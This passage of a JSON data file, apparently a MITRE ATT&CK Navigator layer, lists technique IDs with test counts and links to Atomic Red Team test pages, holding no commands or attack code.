Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1014","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.004/T1021.004.md"}]},{"techniqueID":"T1021.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.005/T1021.005.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1030","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":51,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.004","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":67,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.002","score":20,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":34,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.002/T1098.002.md"}]},{"techniqueID":"T1098.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.003/T1098.003.md"}]},{"techniqueID":"T1098.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1105","score":29,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":68,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1115","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}]},{"techniqueID":"T1127.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1129","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1129/T1129.md"}]},{"techniqueID":"T1132","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1136.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1137","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1137.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.001/T1137.001.md"}]},{"techniqueID":"T1137.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1216.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":78,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1218.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"links":[{"label":"View 